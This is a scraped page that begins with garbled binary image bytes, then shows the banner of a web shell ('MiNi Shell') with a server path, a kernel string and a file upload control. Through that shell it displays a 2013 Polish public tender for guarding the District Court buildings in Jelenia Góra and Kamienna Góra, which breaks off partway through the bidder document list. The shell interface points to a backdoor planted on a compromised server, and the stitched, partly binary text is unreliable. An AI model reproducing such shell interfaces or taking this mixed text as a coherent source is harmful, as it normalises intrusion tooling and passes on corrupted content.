JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130109/14076-N-2013.html

<p class="kh_header"><b>Jelenia Góra: Bezpośrednia ochrona fizyczna osób i mienia w obiektach 
Sądu Rejonowego w Jeleniej Górze.</b><br>
<b>Numer ogłoszenia: 14076 - 2013; data zamieszczenia: 09.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Jeleniej Górze , ul. Bankowa 18, 58-500 Jelenia Góra, woj. dolnośląskie, tel. 075 6471745, faks 075 6471745.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezpośrednia ochrona fizyczna osób i mienia w obiektach 
Sądu Rejonowego w Jeleniej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem Zamówienia jest świadczenie na rzecz Zamawiającego usługi stałej, bezpośredniej ochrony fizycznej mienia należącego do Zamawiającego i ochrony osób znajdujących się w budynkach Zamawiającego. Zamawiający wymaga, aby Wykonawca przy pomocy zatrudnionych przez siebie pracowników ochrony sprawował stałą, bezpośrednią ochronę fizyczną mienia i osób w budynkach Sądu zlokalizowanych w:
- Jeleniej Górze przy ul. Bankowej 18 oraz ul. Wzgórze Kościuszki 2, 
- Kamiennej Górze przy Al. Wojska Polskiego 36.
przy czym : 
a) ochrona w każdym z budynków przy ul. Bankowej 18 oraz ul. Wzgórze Kościuszki 2 w Jeleniej Górze wykonywana będzie przez jednego pracownika ochrony przez całą dobę w tym: 
-		w godzinach 8:00 - 16:00 - w dni urzędowania sądu przez pracownika z licencją  I stopnia, 
-		w godzinach 16:00 - 8:00 i w pozostałe dni przez pracownika bez licencji. 

 Budynek położony przy ul. Bankowej 18 ( centrum miasta) - pow. użytkowa 1.449,5 m2, cztery kondygnacje plus poddasze użytkowe. Budynek ten posiada system monitoringu wyposażony w kamery zainstalowane w newralgicznych punktach, system sygnalizacji alarmowej włamania i napadu oraz system powiadamiania o zagrożeniu pożarowym, składający się z czujników dymu i czujników ruchu rozmieszczonych w poszczególnych pomieszczeniach i ciągach komunikacyjnych. 
Budynek położony przy ul. Wzgórze Kościuszki 2 - pow. użytkowa 786,20 m 2, trzy kondygnacje. Budynek ten posiada system sygnalizacji alarmowej włamania i napadu oraz system powiadamiania o zagrożeniu pożarowym , składający się z czujników dymu i czujników ruchu rozmieszczonych w poszczególnych pomieszczeniach i ciągach komunikacyjnych. Usługa ochrony obejmuje budynek wraz z  przyległą posesją.
b) ochrona w budynkach przy Al. Wojska Polskiego 36 w Kamiennej Górze wykonywana będzie przez jednego pracownika ochrony z licencją I stopnia w następujących dniach i godzinach: 
- wtorek, środa, czwartek, piątek w godzinach 7:30 - 15:30, 
- poniedziałek w godzinach 10:00 - 18:00
Budynek położony przy Al. Wojska Polskiego 36 - pow. użytkowa 1.407,9 m2, trzy kondygnacje. Budynek ten posiada system sygnalizacji alarmowej włamania i napadu oraz system powiadamiania o zagrożeniu pożarowym , składający się z czujników dymu i czujników ruchu rozmieszczonych w poszczególnych pomieszczeniach i ciągach komunikacyjnych. Usługa ochrony obejmuje budynek wraz z  przyległą posesją (parking).
2) Realizacja ochrony obiektów Sądu Rejonowego w Jeleniej Górze i Kamiennej Górze: 
a) 	w celu zabezpieczenia mienia przed próbami dewastacji, uszkodzenia, bądź kradzieży, w tym w wyniku włamania z zewnątrz jak i wewnątrz ochranianego budynku, 
b) 	w celu ochrony w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na terenie chronionego obiektu, 
c) 	powiadamiania odpowiednich służb i straży pożarnej o zagrożeniach, 
d) 	do obowiązków pracowników ochrony naleć będzie między innymi: 
-		podejmowanie działań interwencyjnych w przypadku stwierdzenia zakłóceń porządku na terenie  	chronionego obiektu, dokonywanie obchodu budynku co najmniej raz na 2 godziny zwracając szczególną uwagę na zabezpieczenie przed pożarem lub zalaniem pomieszczeń,
-		ochrona obiektu przed rabunkiem, zagrożeniem wybuchu, pożarem, napadem, kradzieżą, dewastacją,
-	 	monitorowanie przepływu osób przez chroniony obiekt, 
-		niedopuszczenie do wnoszenia na teren ochranianego obiektu materiałów niebezpiecznych, materiałów i towarów przeznaczonych do sprzedaży lub rozpowszechniania, 
-		sprawdzeniu bagażu osób wchodzących do sądu z przedmiotami lub dużymi pakunkami, 
w których mogą znajdować się materiały niebezpieczne bądź ładunki wybuchowe. 
W przypadku, gdy osoby, o których mowa wyżej odmówią okazania zawartości posiadanych pakunków, należy nakazać tym osobom opuszczenia budynku sądu. W przypadku, kiedy osoby te nie dostosują się do poleceń pracowników ochrony, po ich zatrzymaniu należy niezwłocznie przekazać je w ręce wezwanych funkcjonariuszy policji do sądu,
-		sprawowanie kontroli nad legalnością wynoszenia z budynku sprzętu elektronicznego, informatycznego i innych składników majątku sądu,
-		przyjmowanie i wydawanie kluczy przekazanych ochronie przez pracowników Sądu, 
-		pełna znajomość topografii chronionego obiektu - rozkładu pomieszczeń, dróg ewakuacyjnych itp., 
-		znajomość rozmieszczenia i umiejętność obsługi głównych wyłączników prądu, instalacji ppoż., zaworów wodnych i gazowych,
-		prawidłowe reagowanie na mogące wystąpić sytuacje nagłe, awaryjne związane z istniejącymi instalacjami w chronionym obiekcie, 
-		powiadamianie wskazanego pracownika sądu oraz właściwych służb w przypadku stwierdzenia w chronionym obiekcie awarii, włamania lub pożaru oraz podjęcie podstawowych działań zabezpieczających, 
-		prowadzenie książki pełnienia służby, w której odnotowuje się przebieg służby,
-	  niedopuszczaniu do filmowania, fotografowania lub szkicowania pomieszczeń i rejonów objętych zakazem,
-		udostępnianie pomieszczeń sądu w dni wolne od pracy na podstawie zasad określonych w wewnętrznymi przepisami Zamawiającego, 
-		obsługa istniejących w budynku systemów alarmowych napadu, włamania i monitoringu (dotyczy budynku przy ul. Bankowej 18 w Jeleniej Górze), 
-		zapalanie i gaszenie świateł nocnych zewnętrznych i wewnątrz obiektu zgodnie z zaleceniami Zamawiającego (dotyczy budynków w Jeleniej Górze),
-		otwieranie drzwi wejściowych (głównych do budynków sądu) w dniach urzędowania o godzinie 6:45 (dotyczy budynków w Jeleniej Górze),
-		zamykanie drzwi wejściowych (głównych do budynków sądu) w dniach urzędowania: w poniedziałki o godz. 18:30; od wtorku do piątku o godzinie 16:00; w każdym dniu, w wypadku przedłużania się rozpraw - po ich zakończeniu i opuszczeniu budynku przez interesantów (dotyczy budynków w Jeleniej Górze),    
-		po zakończeniu służby zamykanie drzwi wejściowych do sądu (drzwi główne i do Służby Kuratorskiej - dotyczy budynku w Kamiennej Górze), 
-	  otwieraniu i zamykaniu bramy wjazdowej osobom upoważnionym, w celu umożliwienia wjazdu, w szczególności służbom porządkowym i konwojom policyjnym (dotyczy budynku przy ul. Wz. Kościuszki 2 w Jeleniej Górze oraz budynku przy Al. W. Polskiego 36 w Kamiennej Górze).
e)	za sytuację szczególnego zagrożenia uznaje się w szczególności : 
-		pożar i inne zdarzenia losowe na terenie chronionego obiektu, 
-		kradzież z włamaniem, wybuch lub zagrożenie wybuchem w obiekcie chronionym, 
-		terroryzm, 
-		rabunek w obiekcie chronionym. 
f)	Wykonawca na własny koszt wyposaży pracowników ochrony w jednolite mundury z emblematami oferenta oraz potrzebny sprzęt specjalnego przeznaczenia, 
g) 	Wykonawca ponosi odpowiedzialność za szkodę wynikającą z niewykonania, nienależytego wykonania lub wykonania z nienależytą starannością obowiązków w zakresie ochrony na zasadach określonych w kodeksie cywilnym, 
3) 	Zamawiający zobowiąże się informować personel Wykonawcy o sytuacjach zwiększających ryzyko powstania szkody w mieniu podlegającym ochronie. 
4) 	Zamawiający zastrzega sobie możliwość ciągłego nadzoru nad sprawowaniem ochrony  mienia. Pracownicy ochrony w czasie pełnienia służby będą stosować się do poleceń  osób wskazanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi przez weryfikacją aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie ochrony osób i mienia na obszarze, którego dotyczy przedmiotowe zamówienie. Brak aktualnej koncesji zostanie oceniony jako niespełnienie warunku, a Wykonawca podlegać będzie wykluczeniu. 
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Przez zakres  
niezbędny do wykazania spełnienia warunku wiedzy i doświadczenia należy rozumieć wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług ochrony mienia, każda trwająca minimum 12 kolejnych miesięcy i każda o wartości co najmniej 153.000,00 zł. oraz załączenie dokumentu potwierdzającego, że każda z tych usług została wykonana lub jest wykonywana należycie.
 Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie wykazu osób, które będą uczestniczyć w wykonaniu zamówienia.
a)  budynek  przy ul. Bankowej 18 oraz budynek przy ul. Wzgórze Kościuszki 2 w Jeleniej Górze.   Wykaz ma obejmować co najmniej 4 osoby posiadające licencje  I stopnia lub wyższe potwierdzające wymagania kwalifikacyjne pracowników ochrony, do pełnienia służby w godzinach 8:00-16:00 w dni urzędowania sądu, ważne w całym okresie obowiązywania umowy oraz 6 osób nie posiadających licencji, ale posiadające kwalifikacje do ochrony mienia lub wyższe  w pozostałe dni od 16.00 do 8.00. W wykazie należy zamieścić informacje na temat ich kwalifikacji zawodowych, doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami (rodzaj umowy). W wypadku podpisania umowy z Wykonawcą, na świadczenie usług ochrony w dni robocze w godzinach od 8.00 do 16.00, zostaną dopuszczone przez Zamawiającego wyłącznie osoby, które posiadają licencję pracownika ochrony co najmniej I stopnia. Do wykazu osób Wykonawca składa oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia w dni robocze w godzinach od 8.00 do 16.00, posiadają wymagane licencje pracowników ochrony I stopnia oraz wymagane kwalifikacje do pełnienia służby ochrony mienia w pozostałe dni od 16.00 do 8.00. Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy.
b)  budynek  przy Al. Wojska Polskiego 36 w Kamiennej Górze.   
Wykaz ma obejmować co najmniej 2 osoby posiadające licencje  I stopnia lub wyższe potwierdzające wymagania kwalifikacyjne pracowników ochrony, do pełnienia służby, ważne w całym okresie obowiązywania umowy. W wykazie należy zamieścić informacje na temat ich kwalifikacji zawodowych, doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami (rodzaj umowy). W wypadku podpisania umowy z Wykonawcą, na świadczenie usług ochrony, zostaną dopuszczone przez Zamawiającego wyłącznie osoby, które posiadają licencję pracownika ochrony co najmniej I stopnia. Do wykazu osób Wykonawca składa oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia w dni robocze : wtorek, środa, czwartek, piątek  w godzinach od 7.30 do 15.30 oraz poniedziałek 10:00-18:00, posiadają wymagane licencje pracowników ochrony I stopnia. Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy. 
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie wykazu osób, które będą uczestniczyć w wykonaniu zamówienia.
a)  budynek  przy ul. Bankowej 18 oraz budynek przy ul. Wzgórze Kościuszki 2 w Jeleniej Górze.   Wykaz ma obejmować co najmniej 4 osoby posiadające licencje  I stopnia lub wyższe potwierdzające wymagania kwalifikacyjne pracowników ochrony, do pełnienia służby w godzinach 8:00-16:00 w dni urzędowania sądu, ważne w całym okresie obowiązywania umowy oraz 6 osób nie posiadających licencji, ale posiadające kwalifikacje do ochrony mienia lub wyższe  w pozostałe dni od 16.00 do 8.00. W wykazie należy zamieścić informacje na temat ich kwalifikacji zawodowych, doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami (rodzaj umowy). W wypadku podpisania umowy z Wykonawcą, na świadczenie usług ochrony w dni robocze w godzinach od 8.00 do 16.00, zostaną dopuszczone przez Zamawiającego wyłącznie osoby, które posiadają licencję pracownika ochrony co najmniej I stopnia. Do wykazu osób Wykonawca składa oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia w dni robocze w godzinach od 8.00 do 16.00, posiadają wymagane licencje pracowników ochrony I stopnia oraz wymagane kwalifikacje do pełnienia służby ochrony mienia w pozostałe dni od 16.00 do 8.00. Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy.
b)  budynek  przy Al. Wojska Polskiego 36 w Kamiennej Górze.   
Wykaz ma obejmować co najmniej 2 osoby posiadające licencje  I stopnia lub wyższe potwierdzające wymagania kwalifikacyjne pracowników ochrony, do pełnienia służby, ważne w całym okresie obowiązywania umowy. W wykazie należy zamieścić informacje na temat ich kwalifikacji zawodowych, doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami (rodzaj umowy). W wypadku podpisania umowy z Wykonawcą, na świadczenie usług ochrony, zostaną dopuszczone przez Zamawiającego wyłącznie osoby, które posiadają licencję pracownika ochrony co najmniej I stopnia. Do wykazu osób Wykonawca składa oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia w dni robocze : wtorek, środa, czwartek, piątek  w godzinach od 7.30 do 15.30 oraz poniedziałek 10:00-18:00, posiadają wymagane licencje pracowników ochrony I stopnia. Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy. 
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku nastąpi na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę nie mniejszą niż 500 000 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie warunki udziału w postępowaniu mogą być spełnione łącznie. Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
